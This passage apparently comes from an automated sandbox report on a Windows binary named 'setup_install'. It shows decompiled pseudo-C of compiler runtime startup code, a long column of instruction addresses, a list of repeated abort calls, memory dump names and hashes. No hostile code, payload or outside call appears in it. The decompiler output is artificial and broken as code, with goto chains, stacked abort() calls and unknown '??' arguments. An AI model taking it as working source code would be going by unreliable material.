													L17:
													__esi = __ebx;
													goto L12;
												case 0x19:
													L32:
													__ebx =  *(__esi + 1) & 0x000000ff;
													__edx = _a28;
													__edi =  &_a44;
													__eax = __ebx;
													__eax = E0040D720(__ebx, __ecx, _a28);
													 *__esp =  &_a44;
													__ecx = __esi + 2;
													__edx = __eax;
													__eax = __ebx;
													__eax = E0040D5E0(__ebx, __esi + 2, __edx);
													__edi = _a44;
													__ebp = _a20;
													__esi = __eax;
													goto L10;
											}
										}
										L142:
									}
									L13:
									__eax = _a20;
									__eflags = __eax;
									if(__eax == 0) {
										goto L129;
									} else {
										L14:
										__eax =  *(__esp + 0x2c + __eax * 4);
										__esp = __esp + 0x13c;
										_pop(__ebx);
										_pop(__esi);
										_pop(__edi);
										_pop(__ebp);
										return __eax;
									}
									goto L142;
								}
								goto L129;
						}
					}
					goto L10;
				}
				L129:
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				_t209 = _t208 - 0x1c;
				 *_t209 = "libgcc_s_dw2-1.dll";
				_t189 = GetModuleHandleA(_t195);
				_t210 = _t209 - 4;
				if(_t189 == 0) {
					 *0x49f004 = 0x410d00;
					_t203 = E00410B90;
				} else {
					_t197 = _t189;
					 *_t210 = "libgcc_s_dw2-1.dll";
					_t192 = LoadLibraryA(??);
					_t212 = _t210 - 4;
					 *0x4e5df0 = _t192;
					_v40 = "__register_frame_info";
					 *_t212 = _t197;
					_t193 = GetProcAddress(??, ??);
					_t213 = _t212 - 8;
					_t203 = _t193;
					_v40 = "__deregister_frame_info";
					 *_t213 = _t197;
					 *0x49f004 = GetProcAddress(??, ??);
					_t210 = _t213 - 8;
				}
				if(_t203 != 0) {
					_v40 = 0x4e501c;
					 *_t210 = 0x4ab0f8;
					 *_t203();
				}
				 *_t210 = E00401590;
				return E004014C0();
				goto L142;
			}

















                                                                                                                            0x0040ea90
                                                                                                                            0x0040ea90
                                                                                                                            0x0040ea90
                                                                                                                            0x0040ea90
                                                                                                                            0x0040ea97
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ea9d
                                                                                                                            0x0040ea9d
                                                                                                                            0x0040eaa0
                                                                                                                            0x0040eaae
                                                                                                                            0x0040ead9
                                                                                                                            0x0040ead9
                                                                                                                            0x00000000
                                                                                                                            0x0040eab0
                                                                                                                            0x0040eab0
                                                                                                                            0x0040eab0
                                                                                                                            0x0040eab3
                                                                                                                            0x00000000
                                                                                                                            0x0040eb82
                                                                                                                            0x0040eb82
                                                                                                                            0x0040eb84
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040eb8b
                                                                                                                            0x0040eb8b
                                                                                                                            0x0040eb8d
                                                                                                                            0x0040eb8f
                                                                                                                            0x0040eb90
                                                                                                                            0x0040eb90
                                                                                                                            0x0040eb90
                                                                                                                            0x0040eb92
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040eb99
                                                                                                                            0x0040eb99
                                                                                                                            0x0040eb9b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040eba2
                                                                                                                            0x0040eba2
                                                                                                                            0x0040eba4
                                                                                                                            0x0040eba6
                                                                                                                            0x0040eba8
                                                                                                                            0x0040eba8
                                                                                                                            0x0040eba8
                                                                                                                            0x0040ebaa
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ebb1
                                                                                                                            0x0040ebb1
                                                                                                                            0x0040ebb4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ebbb
                                                                                                                            0x0040ebbb
                                                                                                                            0x0040ebbd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ebc4
                                                                                                                            0x0040ebc4
                                                                                                                            0x0040ebc6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ebcd
                                                                                                                            0x0040ebcd
                                                                                                                            0x0040ebcf
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ebd6
                                                                                                                            0x0040ebd6
                                                                                                                            0x0040ebd8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ebdf
                                                                                                                            0x0040ebdf
                                                                                                                            0x0040ebe1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ebe8
                                                                                                                            0x0040ebe8
                                                                                                                            0x0040ebea
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ebf1
                                                                                                                            0x0040ebf1
                                                                                                                            0x0040ebf3
                                                                                                                            0x0040ebf5
                                                                                                                            0x0040ebf7
                                                                                                                            0x0040ebfa
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ec01
                                                                                                                            0x0040ec01
                                                                                                                            0x0040ec03
                                                                                                                            0x0040ec05
                                                                                                                            0x0040ec07
                                                                                                                            0x0040ec0a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ec11
                                                                                                                            0x0040ec11
                                                                                                                            0x0040ec13
                                                                                                                            0x0040ec15
                                                                                                                            0x0040ec17
                                                                                                                            0x0040ec1a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ec21
                                                                                                                            0x0040ec21
                                                                                                                            0x0040ec23
                                                                                                                            0x0040ec25
                                                                                                                            0x0040ec27
                                                                                                                            0x0040ec2a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ec31
                                                                                                                            0x0040ec31
                                                                                                                            0x0040ec33
                                                                                                                            0x0040ec35
                                                                                                                            0x0040ec37
                                                                                                                            0x0040ec3a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ec41
                                                                                                                            0x0040ec41
                                                                                                                            0x0040ec43
                                                                                                                            0x0040ec45
                                                                                                                            0x0040ec47
                                                                                                                            0x0040ec4a
                                                                                                                            0x0040e640
                                                                                                                            0x0040e640
                                                                                                                            0x0040e640
                                                                                                                            0x0040e643
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e649
                                                                                                                            0x0040e649
                                                                                                                            0x0040e64c
                                                                                                                            0x0040e650
                                                                                                                            0x0040e654
                                                                                                                            0x0040e654
                                                                                                                            0x0040e654
                                                                                                                            0x0040e658
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e610
                                                                                                                            0x0040e610
                                                                                                                            0x0040e613
                                                                                                                            0x0040e613
                                                                                                                            0x0040e616
                                                                                                                            0x0040e619
                                                                                                                            0x0040e61b
                                                                                                                            0x0040e61e
                                                                                                                            0x00000000
                                                                                                                            0x0040e624
                                                                                                                            0x0040e624
                                                                                                                            0x0040e624
                                                                                                                            0x0040e627
                                                                                                                            0x00000000
                                                                                                                            0x0040e630
                                                                                                                            0x0040e630
                                                                                                                            0x0040e634
                                                                                                                            0x0040e637
                                                                                                                            0x0040e637
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e6c0
                                                                                                                            0x0040e6c0
                                                                                                                            0x0040e6c4
                                                                                                                            0x0040e6c6
                                                                                                                            0x00000000
                                                                                                                            0x0040e6cc
                                                                                                                            0x0040e6cc
                                                                                                                            0x0040e6cc
                                                                                                                            0x0040e6ce
                                                                                                                            0x0040e6d1
                                                                                                                            0x0040e6d5
                                                                                                                            0x0040e6d8
                                                                                                                            0x0040eb79
                                                                                                                            0x0040eb79
                                                                                                                            0x0040eb7b
                                                                                                                            0x0040e6de
                                                                                                                            0x0040e6de
                                                                                                                            0x0040e6de
                                                                                                                            0x0040eae0
                                                                                                                            0x0040eae0
                                                                                                                            0x0040eae3
                                                                                                                            0x0040eaf0
                                                                                                                            0x0040eaf0
                                                                                                                            0x0040eaf3
                                                                                                                            0x00000000
                                                                                                                            0x0040eaf5
                                                                                                                            0x0040eaf5
                                                                                                                            0x0040eaf5
                                                                                                                            0x0040eaf7
                                                                                                                            0x0040eaf9
                                                                                                                            0x0040eafc
                                                                                                                            0x0040eafe
                                                                                                                            0x0040eafe
                                                                                                                            0x0040eae5
                                                                                                                            0x0040eae5
                                                                                                                            0x0040eae5
                                                                                                                            0x0040eae7
                                                                                                                            0x0040eae7
                                                                                                                            0x0040e6e4
                                                                                                                            0x0040e6e4
                                                                                                                            0x0040e6e4
                                                                                                                            0x0040e6e7
                                                                                                                            0x0040eb10
                                                                                                                            0x0040eb10
                                                                                                                            0x0040eb12
                                                                                                                            0x0040eb12
                                                                                                                            0x0040eb14
                                                                                                                            0x0040eb14
                                                                                                                            0x0040eb14
                                                                                                                            0x0040eb17
                                                                                                                            0x0040eb1d
                                                                                                                            0x0040eb20
                                                                                                                            0x0040eb22
                                                                                                                            0x0040eb25
                                                                                                                            0x0040eb27
                                                                                                                            0x0040eb27
                                                                                                                            0x0040eb2b
                                                                                                                            0x0040eb2d
                                                                                                                            0x0040e6ed
                                                                                                                            0x0040e6ed
                                                                                                                            0x0040e6ed
                                                                                                                            0x0040e6f0
                                                                                                                            0x0040ead0
                                                                                                                            0x0040ead0
                                                                                                                            0x0040ead3
                                                                                                                            0x0040eb70
                                                                                                                            0x0040eb70
                                                                                                                            0x0040eb72
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e6f6
                                                                                                                            0x0040e6f6
                                                                                                                            0x0040e6f6
                                                                                                                            0x0040e6fa
                                                                                                                            0x0040e6fd
                                                                                                                            0x0040e6ff
                                                                                                                            0x0040ec51
                                                                                                                            0x0040ec51
                                                                                                                            0x0040ec54
                                                                                                                            0x0040e705
                                                                                                                            0x0040e705
                                                                                                                            0x0040e705
                                                                                                                            0x0040eb54
                                                                                                                            0x0040eb54
                                                                                                                            0x0040eb56
                                                                                                                            0x00000000
                                                                                                                            0x0040eb5c
                                                                                                                            0x0040eb5c
                                                                                                                            0x0040eb5c
                                                                                                                            0x0040eb5f
                                                                                                                            0x0040eb5f
                                                                                                                            0x0040e70b
                                                                                                                            0x0040e70b
                                                                                                                            0x0040e70b
                                                                                                                            0x0040e70d
                                                                                                                            0x0040e717
                                                                                                                            0x0040e717
                                                                                                                            0x0040e719
                                                                                                                            0x0040e70f
                                                                                                                            0x0040e70f
                                                                                                                            0x0040e70f
                                                                                                                            0x0040e711
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e711
                                                                                                                            0x0040e70d
                                                                                                                            0x0040e705
                                                                                                                            0x0040e6ff
                                                                                                                            0x0040e6f0
                                                                                                                            0x0040e6e7
                                                                                                                            0x0040e6de
                                                                                                                            0x00000000
                                                                                                                            0x0040e6d8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e6b0
                                                                                                                            0x0040e6b0
                                                                                                                            0x0040e6b4
                                                                                                                            0x0040e6b8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e6a0
                                                                                                                            0x0040e6a0
                                                                                                                            0x0040e6a4
                                                                                                                            0x0040e6a8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e692
                                                                                                                            0x0040e692
                                                                                                                            0x0040e696
                                                                                                                            0x0040e69a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e685
                                                                                                                            0x0040e685
                                                                                                                            0x0040e689
                                                                                                                            0x0040e68d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e675
                                                                                                                            0x0040e675
                                                                                                                            0x0040e678
                                                                                                                            0x0040e67c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e933
                                                                                                                            0x0040e933
                                                                                                                            0x0040e935
                                                                                                                            0x0040e937
                                                                                                                            0x0040e937
                                                                                                                            0x0040e940
                                                                                                                            0x0040e940
                                                                                                                            0x0040e940
                                                                                                                            0x0040e943
                                                                                                                            0x0040e949
                                                                                                                            0x0040e94c
                                                                                                                            0x0040e94e
                                                                                                                            0x0040e951
                                                                                                                            0x0040e953
                                                                                                                            0x0040e953
                                                                                                                            0x0040e957
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e8f0
                                                                                                                            0x0040e8f0
                                                                                                                            0x0040e8f2
                                                                                                                            0x0040e8f2
                                                                                                                            0x0040e8f4
                                                                                                                            0x0040e8f4
                                                                                                                            0x0040e8f4
                                                                                                                            0x0040e8f7
                                                                                                                            0x0040e8fd
                                                                                                                            0x0040e900
                                                                                                                            0x0040e902
                                                                                                                            0x0040e905
                                                                                                                            0x0040e907
                                                                                                                            0x0040e907
                                                                                                                            0x0040e90b
                                                                                                                            0x0040e90e
                                                                                                                            0x00000000
                                                                                                                            0x0040e914
                                                                                                                            0x0040e914
                                                                                                                            0x0040e914
                                                                                                                            0x0040e914
                                                                                                                            0x0040e917
                                                                                                                            0x00000000
                                                                                                                            0x0040e91d
                                                                                                                            0x0040e91d
                                                                                                                            0x0040e91d
                                                                                                                            0x0040e922
                                                                                                                            0x0040e926
                                                                                                                            0x0040e92a
                                                                                                                            0x0040e92c
                                                                                                                            0x0040e92c
                                                                                                                            0x0040e917
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e8d0
                                                                                                                            0x0040e8d0
                                                                                                                            0x0040e8d4
                                                                                                                            0x0040e8d6
                                                                                                                            0x00000000
                                                                                                                            0x0040e8dc
                                                                                                                            0x0040e8dc
                                                                                                                            0x0040e8dc
                                                                                                                            0x0040e8e0
                                                                                                                            0x00000000
                                                                                                                            0x0040e8e0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e8b0
                                                                                                                            0x0040e8b0
                                                                                                                            0x0040e8b4
                                                                                                                            0x0040e8b6
                                                                                                                            0x00000000
                                                                                                                            0x0040e8bc
                                                                                                                            0x0040e8bc
                                                                                                                            0x0040e8bc
                                                                                                                            0x0040e8bf
                                                                                                                            0x0040e8c1
                                                                                                                            0x00000000
                                                                                                                            0x0040e8c1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e893
                                                                                                                            0x0040e893
                                                                                                                            0x0040e897
                                                                                                                            0x0040e89a
                                                                                                                            0x00000000
                                                                                                                            0x0040e8a0
                                                                                                                            0x0040e8a0
                                                                                                                            0x0040e8a0
                                                                                                                            0x0040e8a4
                                                                                                                            0x00000000
                                                                                                                            0x0040e8a4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e870
                                                                                                                            0x0040e870
                                                                                                                            0x0040e874
                                                                                                                            0x0040e878
                                                                                                                            0x0040e87b
                                                                                                                            0x0040e87e
                                                                                                                            0x0040e880
                                                                                                                            0x00000000
                                                                                                                            0x0040e886
                                                                                                                            0x0040e886
                                                                                                                            0x0040e886
                                                                                                                            0x0040e888
                                                                                                                            0x0040e88a
                                                                                                                            0x00000000
                                                                                                                            0x0040e88a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ea65
                                                                                                                            0x0040ea65
                                                                                                                            0x0040ea69
                                                                                                                            0x0040ea6c
                                                                                                                            0x00000000
                                                                                                                            0x0040ea72
                                                                                                                            0x0040ea72
                                                                                                                            0x0040ea72
                                                                                                                            0x0040ea75
                                                                                                                            0x0040ea78
                                                                                                                            0x0040ea7c
                                                                                                                            0x0040ea80
                                                                                                                            0x0040ea84
                                                                                                                            0x0040ea86
                                                                                                                            0x00000000
                                                                                                                            0x0040ea86
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ea30
                                                                                                                            0x0040ea30
                                                                                                                            0x0040ea34
                                                                                                                            0x0040ea37
                                                                                                                            0x00000000
                                                                                                                            0x0040ea3d
                                                                                                                            0x0040ea3d
                                                                                                                            0x0040ea3d
                                                                                                                            0x0040ea40
                                                                                                                            0x0040ea43
                                                                                                                            0x0040ea46
                                                                                                                            0x0040ea4a
                                                                                                                            0x0040ea4e
                                                                                                                            0x0040ea52
                                                                                                                            0x0040ea56
                                                                                                                            0x0040ea5a
                                                                                                                            0x0040ea5e
                                                                                                                            0x00000000
                                                                                                                            0x0040ea5e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e9e0
                                                                                                                            0x0040e9e0
                                                                                                                            0x0040e9e4
                                                                                                                            0x0040e9e6
                                                                                                                            0x00000000
                                                                                                                            0x0040e9ec
                                                                                                                            0x0040e9ec
                                                                                                                            0x0040e9ec
                                                                                                                            0x0040e9ef
                                                                                                                            0x0040e9f1
                                                                                                                            0x0040e9f5
                                                                                                                            0x0040e9f8
                                                                                                                            0x0040e9fc
                                                                                                                            0x0040e9fe
                                                                                                                            0x0040eb05
                                                                                                                            0x0040ea04
                                                                                                                            0x0040ea04
                                                                                                                            0x0040ea08
                                                                                                                            0x0040ea08
                                                                                                                            0x00000000
                                                                                                                            0x0040e9fe
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ea20
                                                                                                                            0x0040ea20
                                                                                                                            0x0040ea24
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ea10
                                                                                                                            0x0040ea10
                                                                                                                            0x0040ea13
                                                                                                                            0x0040ea17
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e830
                                                                                                                            0x0040e830
                                                                                                                            0x0040e833
                                                                                                                            0x0040e836
                                                                                                                            0x00000000
                                                                                                                            0x0040e83c
                                                                                                                            0x0040e83c
                                                                                                                            0x0040e83c
                                                                                                                            0x0040e840
                                                                                                                            0x0040e847
                                                                                                                            0x0040e84a
                                                                                                                            0x0040e84e
                                                                                                                            0x0040e85b
                                                                                                                            0x0040e85b
                                                                                                                            0x0040e85e
                                                                                                                            0x00000000
                                                                                                                            0x0040e864
                                                                                                                            0x0040e864
                                                                                                                            0x00000000
                                                                                                                            0x0040e864
                                                                                                                            0x0040e850
                                                                                                                            0x0040e850
                                                                                                                            0x0040e850
                                                                                                                            0x0040e855
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e855
                                                                                                                            0x0040e84e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e7b0
                                                                                                                            0x0040e7b0
                                                                                                                            0x0040e7b2
                                                                                                                            0x0040e7b2
                                                                                                                            0x0040e7b4
                                                                                                                            0x0040e7c0
                                                                                                                            0x0040e7c0
                                                                                                                            0x0040e7c0
                                                                                                                            0x0040e7c3
                                                                                                                            0x0040e7c9
                                                                                                                            0x0040e7cc
                                                                                                                            0x0040e7ce
                                                                                                                            0x0040e7d1
                                                                                                                            0x0040e7d3
                                                                                                                            0x0040e7d3
                                                                                                                            0x0040e7d7
                                                                                                                            0x0040e7d9
                                                                                                                            0x0040e7db
                                                                                                                            0x0040e7dd
                                                                                                                            0x0040e7e0
                                                                                                                            0x0040e7e2
                                                                                                                            0x0040e7e2
                                                                                                                            0x0040e7e5
                                                                                                                            0x0040eb49
                                                                                                                            0x0040eb4b
                                                                                                                            0x0040eb4d
                                                                                                                            0x0040eb4d
                                                                                                                            0x0040e7e5
                                                                                                                            0x0040e7eb
                                                                                                                            0x0040e7ee
                                                                                                                            0x0040e7f1
                                                                                                                            0x00000000
                                                                                                                            0x0040e7f7
                                                                                                                            0x0040e7f7
                                                                                                                            0x0040e7f7
                                                                                                                            0x0040e7fb
                                                                                                                            0x0040e802
                                                                                                                            0x0040e805
                                                                                                                            0x0040e809
                                                                                                                            0x0040e812
                                                                                                                            0x0040e812
                                                                                                                            0x0040e815
                                                                                                                            0x00000000
                                                                                                                            0x0040e81b
                                                                                                                            0x0040e81b
                                                                                                                            0x0040e81b
                                                                                                                            0x00000000
                                                                                                                            0x0040e81b
                                                                                                                            0x0040e80b
                                                                                                                            0x0040e80b
                                                                                                                            0x0040e80b
                                                                                                                            0x0040e810
                                                                                                                            0x0040e81d
                                                                                                                            0x0040e81d
                                                                                                                            0x0040e81f
                                                                                                                            0x0040e821
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e810
                                                                                                                            0x0040e809
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e751
                                                                                                                            0x0040e751
                                                                                                                            0x0040e753
                                                                                                                            0x0040e753
                                                                                                                            0x0040e755
                                                                                                                            0x0040e755
                                                                                                                            0x0040e755
                                                                                                                            0x0040e758
                                                                                                                            0x0040e75e
                                                                                                                            0x0040e761
                                                                                                                            0x0040e763
                                                                                                                            0x0040e766
                                                                                                                            0x0040e768
                                                                                                                            0x0040e768
                                                                                                                            0x0040e76c
                                                                                                                            0x0040e76f
                                                                                                                            0x00000000
                                                                                                                            0x0040e775
                                                                                                                            0x0040e775
                                                                                                                            0x0040e775
                                                                                                                            0x0040e779
                                                                                                                            0x0040e780
                                                                                                                            0x0040e783
                                                                                                                            0x0040e787
                                                                                                                            0x0040e794
                                                                                                                            0x0040e794
                                                                                                                            0x0040e796
                                                                                                                            0x00000000
                                                                                                                            0x0040e79c
                                                                                                                            0x0040e79c
                                                                                                                            0x0040e79c
                                                                                                                            0x0040e79e
                                                                                                                            0x0040e7a2
                                                                                                                            0x00000000
                                                                                                                            0x0040e7a2
                                                                                                                            0x0040e789
                                                                                                                            0x0040e789
                                                                                                                            0x0040e789
                                                                                                                            0x0040e78e
                                                                                                                            0x0040eac0
                                                                                                                            0x0040eac0
                                                                                                                            0x0040eac4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e78e
                                                                                                                            0x0040e787
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e960
                                                                                                                            0x0040e960
                                                                                                                            0x0040e962
                                                                                                                            0x0040e962
                                                                                                                            0x0040e964
                                                                                                                            0x0040e964
                                                                                                                            0x0040e964
                                                                                                                            0x0040e967
                                                                                                                            0x0040e96d
                                                                                                                            0x0040e970
                                                                                                                            0x0040e972
                                                                                                                            0x0040e975
                                                                                                                            0x0040e977
                                                                                                                            0x0040e977
                                                                                                                            0x0040e97b
                                                                                                                            0x0040e97d
                                                                                                                            0x0040e97d
                                                                                                                            0x0040e980
                                                                                                                            0x0040e980
                                                                                                                            0x0040e980
                                                                                                                            0x0040e983
                                                                                                                            0x0040e989
                                                                                                                            0x0040e98c
                                                                                                                            0x0040e98e
                                                                                                                            0x0040e991
                                                                                                                            0x0040e993
                                                                                                                            0x0040e993
                                                                                                                            0x0040e997
                                                                                                                            0x0040e99a
                                                                                                                            0x0040e99c
                                                                                                                            0x0040e99e
                                                                                                                            0x0040eb39
                                                                                                                            0x0040eb3b
                                                                                                                            0x0040eb3d
                                                                                                                            0x0040eb3d
                                                                                                                            0x0040e99e
                                                                                                                            0x0040e9a4
                                                                                                                            0x0040e9a7
                                                                                                                            0x00000000
                                                                                                                            0x0040e9ad
                                                                                                                            0x0040e9ad
                                                                                                                            0x0040e9ad
                                                                                                                            0x0040e9b1
                                                                                                                            0x0040e9b8
                                                                                                                            0x0040e9bb
                                                                                                                            0x0040e9bf
                                                                                                                            0x0040e9c8
                                                                                                                            0x0040e9c8
                                                                                                                            0x0040e9cb
                                                                                                                            0x00000000
                                                                                                                            0x0040e9d1
                                                                                                                            0x0040e9d1
                                                                                                                            0x0040e9d1
                                                                                                                            0x00000000
                                                                                                                            0x0040e9d1
                                                                                                                            0x0040e9c1
                                                                                                                            0x0040e9c1
                                                                                                                            0x0040e9c1
                                                                                                                            0x0040e9c6
                                                                                                                            0x0040e9d3
                                                                                                                            0x0040e9d3
                                                                                                                            0x0040e9d5
                                                                                                                            0x0040e9d9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e9c6
                                                                                                                            0x0040e9bf
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e681
                                                                                                                            0x0040e681
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e720
                                                                                                                            0x0040e720
                                                                                                                            0x0040e724
                                                                                                                            0x0040e728
                                                                                                                            0x0040e72c
                                                                                                                            0x0040e72e
                                                                                                                            0x0040e733
                                                                                                                            0x0040e736
                                                                                                                            0x0040e739
                                                                                                                            0x0040e73b
                                                                                                                            0x0040e73d
                                                                                                                            0x0040e742
                                                                                                                            0x0040e746
                                                                                                                            0x0040e74a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e627
                                                                                                                            0x00000000
                                                                                                                            0x0040e61e
                                                                                                                            0x0040e65a
                                                                                                                            0x0040e65a
                                                                                                                            0x0040e65e
                                                                                                                            0x0040e660
                                                                                                                            0x00000000
                                                                                                                            0x0040e666
                                                                                                                            0x0040e666
                                                                                                                            0x0040e666
                                                                                                                            0x0040e66a
                                                                                                                            0x0040e670
                                                                                                                            0x0040e671
                                                                                                                            0x0040e672
                                                                                                                            0x0040e673
                                                                                                                            0x0040e674
                                                                                                                            0x0040e674
                                                                                                                            0x00000000
                                                                                                                            0x0040e660
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040eab3
                                                                                                                            0x00000000
                                                                                                                            0x0040eaae
                                                                                                                            0x004986e6
                                                                                                                            0x004986e6
                                                                                                                            0x004986eb
                                                                                                                            0x004986f0
                                                                                                                            0x004986f5
                                                                                                                            0x004986fa
                                                                                                                            0x004986ff
                                                                                                                            0x00498704
                                                                                                                            0x00498709
                                                                                                                            0x0049870e
                                                                                                                            0x00498713
                                                                                                                            0x00498718
                                                                                                                            0x00498720
                                                                                                                            0x00498725
                                                                                                                            0x004014e6
                                                                                                                            0x004014e9
                                                                                                                            0x004014f0
                                                                                                                            0x004014f6
                                                                                                                            0x004014fb
                                                                                                                            0x00401570
                                                                                                                            0x0040157a
                                                                                                                            0x004014fd
                                                                                                                            0x004014fd
                                                                                                                            0x004014ff
                                                                                                                            0x00401506
                                                                                                                            0x00401512
                                                                                                                            0x00401515
                                                                                                                            0x0040151a
                                                                                                                            0x00401522
                                                                                                                            0x00401525
                                                                                                                            0x00401527
                                                                                                                            0x0040152a
                                                                                                                            0x0040152c
                                                                                                                            0x00401534
                                                                                                                            0x00401539
                                                                                                                            0x0040153e
                                                                                                                            0x0040153e
                                                                                                                            0x00401543
                                                                                                                            0x00401545
                                                                                                                            0x0040154d
                                                                                                                            0x00401554
                                                                                                                            0x00401554
                                                                                                                            0x00401556
                                                                                                                            0x00401569
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • abort.MSVCRT ref: 0040EAD9
                                                                                                                            • abort.MSVCRT ref: 004986E6
                                                                                                                            • abort.MSVCRT ref: 004986EB
                                                                                                                            • abort.MSVCRT ref: 004986F0
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986F5
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FA
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FF
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498704
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498709
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 0049870E
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498713
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4206212132-0
                                                                                                                            • Opcode ID: ee06980c2fbdbf530afa49847672d1be12b4bd0d588c796cc47c97a3cc8f4862
                                                                                                                            • Instruction ID: e1f3439f77045ee87bac155df8e2fbd730a6fd89d5a8a43d63058354f32d2edb
                                                                                                                            • Opcode Fuzzy Hash: ee06980c2fbdbf530afa49847672d1be12b4bd0d588c796cc47c97a3cc8f4862
                                                                                                                            • Instruction Fuzzy Hash: E631A073A081368FC3A45C6A748516A61C353D8374B6F0E7BA606F3380D9BB8C62958A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

